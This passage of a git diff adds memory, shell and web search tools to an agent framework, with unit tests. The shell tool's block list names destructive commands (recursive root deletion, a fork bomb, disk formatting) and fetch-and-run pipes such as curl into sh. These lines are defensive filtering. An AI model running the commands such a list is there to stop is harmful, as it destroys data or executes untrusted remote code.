parts.append(base_prompt) + + return "\n\n".join(parts) if parts else base_prompt diff --git a/src/agentkit/tools/__init__.py b/src/agentkit/tools/__init__.py index 6feb772..ea333a8 100644 --- a/src/agentkit/tools/__init__.py +++ b/src/agentkit/tools/__init__.py @@ -10,6 +10,9 @@ from agentkit.tools.web_crawl import WebCrawlTool from agentkit.tools.schema_tools import SchemaExtractTool, SchemaGenerateTool from agentkit.tools.baidu_search import BaiduSearchTool from agentkit.tools.ask_human import AskHumanTool +from agentkit.tools.memory_tool import MemoryTool +from agentkit.tools.shell import ShellTool +from agentkit.tools.web_search import WebSearchTool # Conditional import: HeadroomRetrieveTool requires HeadroomCompressor try: @@ -31,5 +34,8 @@ __all__ = [ "SchemaGenerateTool", "BaiduSearchTool", "AskHumanTool", + "MemoryTool", + "ShellTool", + "WebSearchTool", "HeadroomRetrieveTool", ] diff --git a/src/agentkit/tools/memory_tool.py b/src/agentkit/tools/memory_tool.py new file mode 100644 index 0000000..a1010d9 --- /dev/null +++ b/src/agentkit/tools/memory_tool.py @@ -0,0 +1,117 @@ +"""MemoryTool — Agent 可在对话中读写记忆的工具. + +操作: +- add: 追加内容到指定 section +- replace: 替换 section 内的文本 +- remove: 删除整个 section +- read: 读取文件内容 + +file 参数: soul | user | memory | daily +""" + +from __future__ import annotations + +from typing import Any + +from agentkit.memory.profile import MemoryStore +from agentkit.tools.base import Tool + + +VALID_FILES = {"soul", "user", "memory", "daily"} +VALID_ACTIONS = {"add", "replace", "remove", "read"} + + +class MemoryTool(Tool): + """Agent 可调用的记忆操作工具. + + 让 Agent 在对话中读写 SOUL/USER/MEMORY/DAILY 记忆文件。 + """ + + def __init__(self, memory_store: MemoryStore): + super().__init__( + name="memory", + description="Read and write persistent memory files. Use to remember user preferences, project info, and notes across sessions.", + input_schema={ + "type": "object", + "properties": { + "action": { + "type": "string", + "enum": list(VALID_ACTIONS), + "description": "Operation: add, replace, remove, read", + }, + "file": { + "type": "string", + "enum": list(VALID_FILES), + "description": "Memory file: soul (agent identity), user (user profile), memory (work notes), daily (today's log)", + }, + "section": { + "type": "string", + "description": "Section name within the file (e.g. '项目信息', '偏好')", + }, + "content": { + "type": "string", + "description": "Content to add or new text for replace", + }, + "old_text": { + "type": "string", + "description": "Text to find for replace action", + }, + "new_text": { + "type": "string", + "description": "Replacement text for replace action", + }, + }, + "required": ["action", "file"], + }, + ) + self._store = memory_store + + async def execute(self, **kwargs) -> dict[str, Any]: + action = kwargs.get("action", "") + file_key = kwargs.get("file", "") + + # Validate + if file_key not in VALID_FILES: + return {"success": False, "error": f"Invalid file: {file_key}. Must be one of {VALID_FILES}"} + if action not in VALID_ACTIONS: + return {"success": False, "error": f"Unknown action: {action}. Must be one of {VALID_ACTIONS}"} + + try: + mf = self._store.get_file(file_key) + + if action == "read": + content = mf.read() + return {"success": True, "content": content} + + elif action == "add": + section = kwargs.get("section", "") + content = kwargs.get("content", "") + if not section: + return {"success": False, "error": "section is required for add action"} + mf.add_section(section, content) + return {"success": True, "message": f"Added to {file_key}/{section}"} + + elif action == "replace": + section = kwargs.get("section", "") + old_text = kwargs.get("old_text", "") + new_text = kwargs.get("new_text", "") + if not section: + return {"success": False, "error": "section is required for replace action"} + if not old_text: + return {"success": False, "error": "old_text is required for replace action"} + success = mf.replace_section(section, old_text, new_text) + if not success: + return {"success": False, "error": f"old_text not found in {file_key}/{section}"} + return {"success": True, "message": f"Replaced in {file_key}/{section}"} + + elif action == "remove": + section = kwargs.get("section", "") + if not section: + return {"success": False, "error": "section is required for remove action"} + mf.remove_section(section) + return {"success": True, "message": f"Removed {file_key}/{section}"} + + return {"success": False, "error": f"Unhandled action: {action}"} + + except Exception as e: + return {"success": False, "error": str(e)} diff --git a/src/agentkit/tools/shell.py b/src/agentkit/tools/shell.py new file mode 100644 index 0000000..27cd0e6 --- /dev/null +++ b/src/agentkit/tools/shell.py @@ -0,0 +1,233 @@ +"""ShellTool — 安全的命令行执行工具。 + +支持白名单命令、超时控制、工作目录设置。 +默认白名单包含安全的只读命令,可通过配置扩展。 +""" + +import asyncio +import logging +import shlex +from typing import Any + +from agentkit.tools.base import Tool + +logger = logging.getLogger(__name__) + +# Default allowed commands (safe, read-only) +DEFAULT_ALLOWED_COMMANDS: list[str] = [ + "ls", "cat", "head", "tail", "wc", "find", "grep", "rg", + "git", "git log", "git diff", "git show", "git status", "git branch", + "python3", "python", "node", "npm", "pip", "pip3", + "echo", "pwd", "which", "whoami", "date", "uname", + "curl", "wget", # Network fetch (read-only) + "docker", "docker ps", "docker logs", + "pytest", "vitest", "jest", "make", +] + +# Dangerous patterns that are always blocked +BLOCKED_PATTERNS: list[str] = [ + "rm -rf /", "rm -rf /*", ":(){ :|:& };:", + "mkfs", "dd if=", "> /dev/sd", "chmod 777 /", +] + +# Regex patterns for dangerous commands (more flexible matching) +import re + +BLOCKED_REGEX_PATTERNS: list[re.Pattern[str]] = [ + re.compile(r"curl\s.*\|\s*sh", re.IGNORECASE), + re.compile(r"curl\s.*\|\s*bash", re.IGNORECASE), + re.compile(r"wget\s.*\|\s*sh", re.IGNORECASE), + re.compile(r"wget\s.*\|\s*bash", re.IGNORECASE), +] + + +class ShellTool(Tool): + """安全的命令行执行工具。 + + 特性: + - 白名单命令过滤(可配置) + - 超时控制(默认 30 秒) + - 工作目录设置 + - 危险命令拦截 + - 输出截断(防止 token 膨胀) + """ + + def __init__( + self, + name: str = "shell", + description: str = "执行命令行命令。支持白名单内的安全命令,有超时控制。", + input_schema: dict[str, Any] | None = None, + output_schema: dict[str, Any] | None = None, + version: str = "1.0.0", + tags: list[str] | None = None, + allowed_commands: list[str] | None = None, + default_timeout: int = 30, + max_output_length: int = 10000, + working_dir: str | None = None, + allow_all: bool = False, + ): + super().__init__( + name=name, + description=description, + input_schema=input_schema or self._default_input_schema(), + output_schema=output_schema or self._default_output_schema(), + version=version, + tags=tags or ["shell", "system"], + ) + self._allowed_commands = allowed_commands or DEFAULT_ALLOWED_COMMANDS + self._default_timeout = default_timeout + self._max_output_length = max_output_length + self._working_dir = working_dir + self._allow_all = allow_all + + @staticmethod + def _default_input_schema() -> dict[str, Any]: + return { + "type": "object", + "properties": { + "command": { + "type": "string", + "description": "要执行的命令", + }, + "timeout": { + "type": "integer", + "description": "超时秒数(默认 30)", + "default": 30, + }, + "working_dir": { + "type": "string", + "description": "工作目录(可选)", + }, + }, + "required": ["command"], + } + + @staticmethod + def _default_output_schema() -> dict[str, Any]: + return { + "type": "object", + "properties": { + "stdout": {"type": "string", "description": "标准输出"}, + "stderr": {"type": "string", "description": "标准错误"}, + "exit_code": {"type": "integer", "description": "退出码"}, + "success": {"type": "boolean", "description": "是否成功(exit_code == 0)"}, + "timed_out": {"type": "boolean", "description": "是否超时"}, + "error": {"type": "string", "description": "错误信息(仅失败时)"}, + }, + } + + def _is_command_allowed(self, command: str) -> tuple[bool, str]: + """检查命令是否在白名单内。""" + command_lower = command.lower().strip() + + # Block dangerous patterns first (even in allow_all mode) + for pattern in BLOCKED_PATTERNS: + if pattern in command_lower: + return False, f"Blocked dangerous pattern: {pattern}" + + for regex in BLOCKED_REGEX_PATTERNS: + if regex.search(command_lower): + return False, f"Blocked dangerous pattern: {regex.pattern}" + + if self._allow_all: + return True, "" + + # Extract the base command (first token) + try: + tokens = shlex.split(command) + except ValueError: + return False, "Invalid command syntax" + + if not tokens: + return False, "Empty command" + + base = tokens[0] + # Also check two-word prefixes like "git log", "docker ps" + two_word = f"{base} {tokens[1]}" if len(tokens) > 1 else "" + + for allowed in self._allowed_commands: + if base == allowed or two_word == allowed: + return True, "" + + return False, f"Command '{base}' not in allowed list. Allowed: {', '.join(sorted(set(self._allowed_commands)))}" + + async def execute(self, **kwargs) -> dict: + """执行命令行命令。""" + command = kwargs.get("command") + if not command: + return {"error": "command 参数是必需的", "success": False} + + timeout = kwargs.get("timeout", self._default_timeout) + working_dir = kwargs.get("working_dir", self._working_dir) + + # Security check + allowed, reason = self._is_command_allowed(command) + if not allowed: + return { + "error": f"Command not allowed: {reason}", + "success": False, + "stdout": "", + "stderr": "", + "exit_code": -1, + "timed_out": False, + } + + try: + proc = await asyncio.create_subprocess_shell( + command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + cwd=working_dir, + ) + + try: + stdout_bytes, stderr_bytes = await asyncio.wait_for( + proc.communicate(), + timeout=timeout, + ) + timed_out = False + except asyncio.TimeoutError: + proc.kill() + await proc.wait() + return { + "stdout": "", + "stderr": f"Command timed out after {timeout}s", + "exit_code": -1, + "success": False, + "timed_out": True, + } + + stdout = stdout_bytes.decode("utf-8", errors="replace") + stderr = stderr_bytes.decode("utf-8", errors="replace") + + # Truncate output if too long + truncated = False + if len(stdout) > self._max_output_length: + stdout = stdout[:self._max_output_length] + f"\n... [truncated, {len(stdout)} chars total]" + truncated = True + if len(stderr) > self._max_output_length: + stderr = stderr[:self._max_output_length] + f"\n... [truncated, {len(stderr)} chars total]" + truncated = True + + result: dict[str, Any] = { + "stdout": stdout, + "stderr": stderr, + "exit_code": proc.returncode or 0, + "success": (proc.returncode or 0) == 0, + "timed_out": False, + } + if truncated: + result["truncated"] = True + + return result + + except Exception as e: + logger.error(f"ShellTool execution failed: {command} - {e}") + return { + "error": str(e), + "stdout": "", + "stderr": str(e), + "exit_code": -1, + "success": False, + "timed_out": False, + } diff --git a/src/agentkit/tools/web_search.py b/src/agentkit/tools/web_search.py new file mode 100644 index 0000000..50afb0c --- /dev/null +++ b/src/agentkit/tools/web_search.py @@ -0,0 +1,254 @@ +"""WebSearchTool — 通用网页搜索工具。 + +支持多种搜索后端,按优先级自动降级: +1. Tavily API(需要 API key,质量最好) +2. Serper API(需要 API key,Google 搜索结果) +3. DuckDuckGo Lite(免费,无需 API key,降级方案) +""" + +import json +import logging +import re +import urllib.parse +from typing import Any + +import httpx + +from agentkit.tools.base import Tool + +logger = logging.getLogger(__name__) + + +class WebSearchTool(Tool): + """通用网页搜索工具。 + + 支持三种后端,按优先级降级: + - Tavily API(高质量,需 key) + - Serper API(Google 结果,需 key) + - DuckDuckGo Lite(免费降级方案) + """ + + def __init__( + self, + name: str = "web_search", + description: str = "搜索互联网信息。返回搜索结果列表,包含标题、链接和摘要。", + input_schema: dict[str, Any] | None = None, + output_schema: dict[str, Any] | None = None, + version: str = "1.0.0", + tags: list[str] | None = None, + tavily_api_key: str | None = None, + serper_api_key: str | None = None, + default_max_results: int = 5, + ): + super().__init__( + name=name, + description=description, + input_schema=input_schema or self._default_input_schema(), + output_schema=output_schema or self._default_output_schema(), + version=version, + tags=tags or ["search", "web"], + ) + self._tavily_key = tavily_api_key + self._serper_key = serper_api_key + self._default_max_results = default_max_results + + @staticmethod + def _default_input_schema() -> dict[str, Any]: + return { + "type": "object", + "properties": { + "query": { + "type": "string", + "description": "搜索关键词", + }, + "max_results": { + "type": "integer", + "description": "最大返回结果数(默认 5)", + "default": 5, + }, + }, + "required": ["query"], + } + + @staticmethod + def _default_output_schema() -> dict[str, Any]: + return { + "type": "object", + "properties": { + "results": { + "type": "array", + "items": { + "type": "object", + "properties": { + "title": {"type": "string"}, + "url": {"type": "string"}, + "snippet": {"type": "string"}, + }, + }, + "description": "搜索结果列表", + }, + "total": {"type": "integer", "description": "结果总数"}, + "backend": {"type": "string", "description": "使用的搜索后端"}, + "success": {"type": "boolean", "description": "是否成功"}, + "error": {"type": "string", "description": "错误信息(仅失败时)"}, + }, + } + + async def execute(self, **kwargs) -> dict: + """执行网页搜索。""" + query = kwargs.get("query") + if not query: + return {"error": "query 参数是必需的", "results": [], "total": 0, "success": False} + + max_results = kwargs.get("max_results", self._default_max_results) + + # Try backends in priority order + if self._tavily_key: + result = await self._search_tavily(query, max_results) + if result.get("success"): + return result + logger.warning(f"Tavily search failed, falling back: {result.get('error')}") + + if self._serper_key: + result = await self._search_serper(query, max_results) + if result.get("success"): + return result + logger.warning(f"Serper search failed, falling back: {result.get('error')}") + + # Fallback: DuckDuckGo + return await self._search_duckduckgo(query, max_results) + + async def _search_tavily(self, query: str, max_results: int) -> dict: + """Tavily API search.""" + try: + async with httpx.AsyncClient(timeout=15) as client: + resp = await client.post( + "https://api.tavily.com/search", + json={ + "api_key": self._tavily_key, + "query": query, + "max_results": max_results, + "search_depth": "basic", + }, + ) + resp.raise_for_status() + data = resp.json() + + results = [] + for item in data.get("results", [])[:max_results]: + results.append({ + "title": item.get("title", ""), + "url": item.get("url", ""), + "snippet": item.get("content", "")[:300], + }) + + return {"results": results, "total": len(results), "backend": "tavily", "success": True} + + except Exception as e: + logger.error(f"Tavily search error: {e}") + return {"error": str(e), "results": [], "total": 0, "success": False} + + async def _search_serper(self, query: str, max_results: int) -> dict: + """Serper API (Google) search.""" + try: + async with httpx.AsyncClient(timeout=15) as client: + resp = await client.post( + "https://google.serper.dev/search", + json={"q": query, "num": max_results}, + headers={"X-API-KEY": self._serper_key}, + ) + resp.raise_for_status() + data = resp.json() + + results = [] + for item in data.get("organic", [])[:max_results]: + results.append({ + "title": item.get("title", ""), + "url": item.get("link", ""), + "snippet": item.get("snippet", "")[:300], + }) + + return {"results": results, "total": len(results), "backend": "serper", "success": True} + + except Exception as e: + logger.error(f"Serper search error: {e}") + return {"error": str(e), "results": [], "total": 0, "success": False} + + async def _search_duckduckgo(self, query: str, max_results: int) -> dict: + """DuckDuckGo Lite search (free, no API key needed). + + Parses the HTML response from DuckDuckGo Lite. + """ + try: + encoded_query = urllib.parse.quote(query) + url = f"https://lite.duckduckgo.com/lite/?q={encoded_query}" + + async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client: + resp = await client.get( + url, + headers={ + "User-Agent": ( + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) " + "AppleWebKit/537.36 (KHTML, like Gecko) " + "Chrome/120.0.0.0 Safari/537.36" + ), + }, + ) + html = resp.text + + results = self._parse_duckduckgo_html(html, max_results) + + return {"results": results, "total": len(results), "backend": "duckduckgo", "success": True} + + except Exception as e: + logger.error(f"DuckDuckGo search error: {e}") + return { + "error": f"Search unavailable: {e}", + "results": [], + "total": 0, + "backend": "duckduckgo", + "success": False, + } + + @staticmethod + def _parse_duckduckgo_html(html: str, max_results: int) -> list[dict[str, str]]: + """Parse DuckDuckGo Lite HTML to extract search results.""" + results: list[dict[str, str]] = [] + + # DuckDuckGo Lite uses for titles + # and for snippets + # Pattern: find result-link anchors, then find the next snippet + link_pattern = re.compile( + r']*class="result-link"[^>]*href="([^"]*)"[^>]*>(.*?)', + re.DOTALL, + ) + snippet_pattern = re.compile( + r']*class="result-snippet"[^>]*>(.*?)', + re.DOTALL, + ) + + links = list(link_pattern.finditer(html)) + snippets = list(snippet_pattern.finditer(html)) + + for i, match in enumerate(links): + if len(results) >= max_results: + break + + url = match.group(1) + title = re.sub(r"<[^>]+>", "", match.group(2)).strip() + + # Skip ad/tracking links + if not url.startswith("http") or "duckduckgo.com" in url: + continue + + snippet = "" + if i < len(snippets): + snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip() + + results.append({ + "title": title[:200], + "url": url, + "snippet": snippet[:300], + }) + + return results diff --git a/tests/unit/test_chat_memory_integration.py b/tests/unit/test_chat_memory_integration.py new file mode 100644 index 0000000..4365a82 --- /dev/null +++ b/tests/unit/test_chat_memory_integration.py @@ -0,0 +1,102 @@ +"""Tests for Chat memory integration — 记忆注入 + MemoryTool + 日志生成 (U4).""" + +from pathlib import Path +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest + +from agentkit.memory.profile import MemoryStore, MemorySnapshot +from agentkit.tools.memory_tool import MemoryTool + + +class TestChatMemoryInjection: + """Chat 启动时记忆注入 system prompt 测试.""" + + def test_memory_store_initializes_with_base_dir(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.ensure_defaults() + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot, "Be helpful.") + assert "" in prompt + assert "AgentKit" in prompt + assert "Be helpful." in prompt + + def test_no_memory_files_returns_base_prompt(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot, "Be helpful.") + assert prompt == "Be helpful." + + def test_default_soul_injected(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.ensure_defaults() + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot) + assert "" in prompt + assert "专业" in prompt or "AgentKit" in prompt + + +class TestChatMemoryToolAvailable: + """MemoryTool 在对话中可用测试.""" + + async def test_memory_tool_in_tools_list(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + tool = MemoryTool(memory_store=store) + assert tool.name == "memory" + assert tool.input_schema is not None + + async def test_memory_tool_add_and_read(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + tool = MemoryTool(memory_store=store) + # Add + result = await tool.execute(action="add", file="user", section="称呼", content="叫我老板") + assert result["success"] is True + # Read + result = await tool.execute(action="read", file="user") + assert "老板" in result["content"] + + +class TestChatMemoryPersistence: + """记忆跨 /clear 会话持久化测试.""" + + def test_memory_survives_session_clear(self, tmp_path: Path): + """/clear 只清除会话历史,不清除记忆文件.""" + store = MemoryStore(base_dir=tmp_path) + store.get_file("user").write("## 称呼\n叫我老板") + + # 模拟 /clear — 重新创建 MemoryStore + store2 = MemoryStore(base_dir=tmp_path) + content = store2.get_file("user").read() + assert "老板" in content + + def test_memory_persists_across_store_instances(self, tmp_path: Path): + store1 = MemoryStore(base_dir=tmp_path) + store1.get_file("memory").write("## 项目\nAgentKit框架") + + store2 = MemoryStore(base_dir=tmp_path) + content = store2.get_file("memory").read() + assert "AgentKit" in content + + +class TestChatDailyLogGeneration: + """会话结束时日志生成测试.""" + + def test_daily_file_path_is_today(self, tmp_path: Path): + from datetime import datetime, timezone + store = MemoryStore(base_dir=tmp_path) + daily = store.get_file("daily") + today = datetime.now(timezone.utc).strftime("%Y-%m-%d") + assert today in str(daily.path) + + def test_write_daily_log(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + daily = store.get_file("daily") + daily.write("讨论了AgentKit记忆系统架构") + content = daily.read() + assert "记忆系统" in content + + def test_daily_log_loads_in_snapshot(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.get_file("daily").write("今天完成了记忆系统开发") + snapshot = store.load_all() + assert "记忆系统" in snapshot.daily diff --git a/tests/unit/test_memory_profile.py b/tests/unit/test_memory_profile.py new file mode 100644 index 0000000..f8a70d7 --- /dev/null +++ b/tests/unit/test_memory_profile.py @@ -0,0 +1,249 @@ +"""Tests for MemoryFile + MemoryStore — 记忆文件读写与多文件管理 (U1+U2).""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot + + +class TestMemoryFileBasicIO: + """MemoryFile 基本读写测试.""" + + def test_read_nonexistent_file_returns_empty(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "no_such.md") + assert mf.read() == "" + + def test_write_and_read_back(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md") + mf.write("hello world") + assert mf.read() == "hello world" + + def test_write_creates_parent_dirs(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "deep" / "nested" / "test.md") + mf.write("content") + assert mf.read() == "content" + + def test_overwrite_existing(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md") + mf.write("first") + mf.write("second") + assert mf.read() == "second" + + +class TestMemoryFileSections: + """MemoryFile section 级别操作测试.""" + + def _make_file(self, tmp_path: Path, content: str) -> MemoryFile: + mf = MemoryFile(tmp_path / "test.md") + mf.write(content) + return mf + + def test_read_section_from_empty_file(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "empty.md") + assert mf.read_section("身份") == "" + + def test_read_section_returns_content(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心") + assert mf.read_section("身份") == "我是小王" + + def test_read_section_not_found_returns_empty(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王") + assert mf.read_section("不存在") == "" + + def test_add_section_creates_new(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王") + mf.add_section("性格", "友好耐心") + assert mf.read_section("性格") == "友好耐心" + assert mf.read_section("身份") == "我是小王" + + def test_add_section_appends_to_existing(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王") + mf.add_section("身份", "也是AI助手") + content = mf.read_section("身份") + assert "我是小王" in content + assert "也是AI助手" in content + + def test_replace_section_text(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心") + mf.replace_section("身份", "我是小王", "我是大王") + assert mf.read_section("身份") == "我是大王" + assert mf.read_section("性格") == "友好耐心" + + def test_replace_section_old_not_found_returns_false(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王") + result = mf.replace_section("身份", "不存在", "新内容") + assert result is False + + def test_remove_section(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心") + mf.remove_section("身份") + assert mf.read_section("身份") == "" + assert mf.read_section("性格") == "友好耐心" + + def test_remove_nonexistent_section_no_error(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王") + mf.remove_section("不存在") # 不抛异常 + assert mf.read_section("身份") == "我是小王" + + def test_list_sections(self, tmp_path: Path): + mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心") + sections = mf.list_sections() + assert sections == ["身份", "性格"] + + +class TestMemoryFileCapacity: + """MemoryFile 容量管理测试.""" + + def test_trim_to_budget_keeps_content_within_limit(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md", char_budget=20) + mf.write("## 身份\n我是小王一个专业的AI助手") # 超过 20 字符 + mf.trim_to_budget() + content = mf.read() + assert len(content) <= 20 + + def test_trim_preserves_earlier_sections(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md", char_budget=30) + mf.write("## 身份\n我是小王\n## 性格\n友好耐心注重细节") # 性格部分超限 + mf.trim_to_budget() + content = mf.read() + assert "身份" in content # 保留前面的 section + + def test_no_trim_when_within_budget(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md", char_budget=1000) + mf.write("## 身份\n我是小王") + mf.trim_to_budget() + assert mf.read() == "## 身份\n我是小王" + + def test_write_auto_trims(self, tmp_path: Path): + mf = MemoryFile(tmp_path / "test.md", char_budget=15) + mf.write("## 身份\n我是小王一个专业的AI助手非常长") + content = mf.read() + assert len(content) <= 15 + + +class TestMemoryStoreInit: + """MemoryStore 初始化测试.""" + + def test_init_creates_base_dir(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path / "new_dir") + assert (tmp_path / "new_dir").exists() + + def test_init_creates_memories_subdir(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + assert (tmp_path / "memories").exists() + + def test_init_creates_daily_subdir(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + assert (tmp_path / "memories" / "daily").exists() + + +class TestMemoryStoreLoadAll: + """MemoryStore load_all 测试.""" + + def test_load_all_returns_snapshot(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + snapshot = store.load_all() + assert isinstance(snapshot, MemorySnapshot) + + def test_load_all_empty_when_no_files(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + snapshot = store.load_all() + assert snapshot.is_empty() + + def test_load_all_with_content(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.get_file("soul").write("## 身份\n我是小王") + store.get_file("user").write("## 称呼\n叫我老板") + snapshot = store.load_all() + assert "小王" in snapshot.soul + assert "老板" in snapshot.user + assert snapshot.total_chars > 0 + + +class TestMemoryStoreBuildPrompt: + """MemoryStore build_system_prompt 测试.""" + + def test_build_prompt_injects_all_sections(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.get_file("soul").write("## 身份\n我是小王") + store.get_file("user").write("## 称呼\n叫我老板") + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot, "Be helpful.") + assert "" in prompt + assert "小王" in prompt + assert "" in prompt + assert "老板" in prompt + assert "Be helpful." in prompt + + def test_build_prompt_no_memory_returns_base_only(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot, "Be helpful.") + assert prompt == "Be helpful." + + def test_build_prompt_empty_base_with_memory(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.get_file("soul").write("## 身份\n我是小王") + snapshot = store.load_all() + prompt = store.build_system_prompt(snapshot) + assert "" in prompt + assert "小王" in prompt + + +class TestMemoryStoreDefaults: + """MemoryStore ensure_defaults 测试.""" + + def test_ensure_defaults_creates_soul(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.ensure_defaults() + soul = store.get_file("soul").read() + assert "AgentKit" in soul + + def test_ensure_defaults_no_overwrite(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + store.get_file("soul").write("## 身份\n自定义内容") + store.ensure_defaults() + soul = store.get_file("soul").read() + assert "自定义内容" in soul + assert "AgentKit" not in soul + + +class TestMemoryStoreDailyLogs: + """MemoryStore 日志管理测试.""" + + def test_load_daily_logs_empty(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + assert store.load_daily_logs() == "" + + def test_load_daily_logs_with_today(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + today = datetime.now(timezone.utc).strftime("%Y-%m-%d") + daily_file = MemoryFile(tmp_path / "memories" / "daily" / f"{today}.md") + daily_file.write("讨论了项目架构") + logs = store.load_daily_logs() + assert "讨论了项目架构" in logs + + def test_archive_old_dailies(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + # 创建一个旧日志 + old_date = (datetime.now(timezone.utc) - timedelta(days=5)).strftime("%Y-%m-%d") + old_file = tmp_path / "memories" / "daily" / f"{old_date}.md" + old_file.parent.mkdir(parents=True, exist_ok=True) + old_file.write_text("旧日志", encoding="utf-8") + count = store.archive_old_dailies(keep_days=2) + assert count == 1 + assert not old_file.exists() + + def test_get_file_daily_returns_today(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + daily = store.get_file("daily") + today = datetime.now(timezone.utc).strftime("%Y-%m-%d") + assert today in str(daily.path) + + def test_get_file_invalid_key_raises(self, tmp_path: Path): + store = MemoryStore(base_dir=tmp_path) + with pytest.raises(ValueError, match="Invalid file_key"): + store.get_file("invalid") diff --git a/tests/unit/test_memory_tool.py b/tests/unit/test_memory_tool.py new file mode 100644 index 0000000..cb87f46 --- /dev/null +++ b/tests/unit/test_memory_tool.py @@ -0,0 +1,112 @@ +"""Tests for MemoryTool — Agent 可调用的记忆操作工具 (U3).""" + +from pathlib import Path + +import pytest + +from agentkit.memory.profile import MemoryStore +from agentkit.tools.memory_tool import MemoryTool + + +@pytest.fixture +def store(tmp_path: Path) -> MemoryStore: + return MemoryStore(base_dir=tmp_path) + + +@pytest.fixture +def tool(store: MemoryStore) -> MemoryTool: + return MemoryTool(memory_store=store) + + +class TestMemoryToolAdd: + """memory_add 操作测试.""" + + async def test_add_creates_new_section(self, tool: MemoryTool, store: MemoryStore): + result = await tool.execute(action="add", file="memory", section="项目信息", content="使用Python和FastAPI") + assert result["success"] is True + content = store.get_file("memory").read_section("项目信息") + assert "Python和FastAPI" in content + + async def test_add_appends_to_existing_section(self, tool: MemoryTool, store: MemoryStore): + store.get_file("memory").write("## 项目信息\n使用Python") + result = await tool.execute(action="add", file="memory", section="项目信息", content="还有TypeScript") + assert result["success"] is True + content = store.get_file("memory").read_section("项目信息") + assert "Python" in content + assert "TypeScript" in content + + async def test_add_to_soul(self, tool: MemoryTool, store: MemoryStore): + result = await tool.execute(action="add", file="soul", section="爱好", content="编程和阅读") + assert result["success"] is True + assert "编程和阅读" in store.get_file("soul").read_section("爱好") + + +class TestMemoryToolReplace: + """memory_replace 操作测试.""" + + async def test_replace_text_in_section(self, tool: MemoryTool, store: MemoryStore): + store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人") + result = await tool.execute( + action="replace", file="memory", section="项目信息", + old_text="Python", new_text="Rust" + ) + assert result["success"] is True + assert "Rust" in store.get_file("memory").read_section("项目信息") + assert "3人" in store.get_file("memory").read_section("团队") + + async def test_replace_old_not_found_fails(self, tool: MemoryTool, store: MemoryStore): + store.get_file("memory").write("## 项目信息\n使用Python") + result = await tool.execute( + action="replace", file="memory", section="项目信息", + old_text="不存在", new_text="新内容" + ) + assert result["success"] is False + assert "not found" in result.get("error", "").lower() + + +class TestMemoryToolRemove: + """memory_remove 操作测试.""" + + async def test_remove_section(self, tool: MemoryTool, store: MemoryStore): + store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人") + result = await tool.execute(action="remove", file="memory", section="项目信息") + assert result["success"] is True + assert store.get_file("memory").read_section("项目信息") == "" + assert "3人" in store.get_file("memory").read_section("团队") + + +class TestMemoryToolRead: + """memory_read 操作测试.""" + + async def test_read_file_content(self, tool: MemoryTool, store: MemoryStore): + store.get_file("memory").write("## 项目信息\n使用Python") + result = await tool.execute(action="read", file="memory") + assert result["success"] is True + assert "Python" in result["content"] + + async def test_read_empty_file(self, tool: MemoryTool, store: MemoryStore): + result = await tool.execute(action="read", file="memory") + assert result["success"] is True + assert result["content"] == "" + + +class TestMemoryToolValidation: + """参数验证测试.""" + + async def test_invalid_file_key(self, tool: MemoryTool): + result = await tool.execute(action="read", file="invalid") + assert result["success"] is False + assert "Invalid" in result.get("error", "") + + async def test_invalid_action(self, tool: MemoryTool): + result = await tool.execute(action="delete_everything", file="memory") + assert result["success"] is 